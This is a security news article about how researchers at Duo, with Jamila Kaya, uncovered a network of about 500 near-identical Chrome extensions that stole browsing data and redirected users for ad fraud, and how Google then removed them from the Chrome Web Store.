Researchers have uncovered and dismantled a long-running malvertising and ad-fraud network that relied on an extensive set of nearly identical Chrome extensions to gather users' private browsing data and direct them to potentially malicious sites.
The campaign began in early 2019 and grew over the course of several months, as the actor behind it added new extensions, plugins, and domains. Security researcher Jamila Kaya discovered the campaign after identifying several Chrome extensions that pretended to be offering ad services but were actually stealing data and redirecting victims to a variety of ad-laden sites. Kaya contacted researchers at Duo about the shady extensions and together they used the CRXcavator tool, which automatically scans and assigns a risk score to Chrome extensions, to identify dozens of extensions that all matched a specific pattern. The 70 extensions had been installed by more than 1.7 million people.
But there were far more extensions connected to this campaign than just those 70. After Duo and Kaya contacted Google, the company’s researchers fingerprinted the suspect extensions and eventually discovered more than 500 extensions that were connected to this campaign and removed them from the Chrome Web Store. CRxcavator was developed internally at Duo to assess the risk of new extensions, but it was released as a free service last year.
“In the case reported here, the Chrome extension creators had specifically made extensions that obfuscated the underlying advertising functionality from users. This was done in order to connect the browser clients to a command and control architecture, exfiltrate private browsing data without the users knowledge, expose the user to risk of exploit through advertising streams, and attempt to evade the Chrome Web Store’s fraud detection mechanisms,” Kaya and Jacob Rickerd, an information security engineer at Duo, said in an analysis of the campaign and extensions.
The campaign that Kaya identified used a complex network of plugins and domains to generate ad revenue for the actor behind it. The extensions have deep connections through their source code, command-and-control infrastructure, and naming conventions.
“The primary malicious activity and ad fraud occurs through the redirection streams."
“The plugins have almost no ratings, and the source code of the plugins are nearly identical to each other. The only substantial differences in the source code are the names of the functions. With a much larger number than similar plugins and services, it’s likely that a single change of all the function names reduces the similarity to other plugins enough to avoid detection mechanisms,” Kaya and Rickerd said.
“The level of permissions requested on each plugin is similarly high and is identical between them, allowing it to access a large amount of data in the browser. In addition, the external sites contacted are identical between all the plugins involved, with the exception of the plugin ‘front’ site.”
Once one of the extensions is on a victim’s machine, it contacts a specific domain associated with each plugin and then it tries to connect to one of three other hard-coded domains. Those domains are the C2 infrastructure and victims’ browsers connect to the domains at irregular intervals to get new instructions, such as where to upload new data and where new redirects should go. The domains the actor uses for all of this activity are generally hosted on AWS and have similar names.
“The primary malicious activity and ad fraud occurs through the redirection streams. The user regularly receives new redirector domains, as they are created in batches, with multiple of the earlier domains being created on the same day and hour. They all operate in the same way, receiving the signal from the host and then sending them to a series of ad streams, and subsequently to legitimate and illegitimate ads,” Kaya and Rickerd said.
Although a sizable chunk of the ad streams that victims see in this campaign are legitimate, 60 to 70 percent of the streams that include a redirect point to a malicious site. During her research, Kaya also identified two domains tied to the campaign that were distributing malware. Although the campaign that Kaya uncovered appears to have started in January 2019, some of the infrastructure was created as far back as 2017, and new redirector domains were registered as recently as April.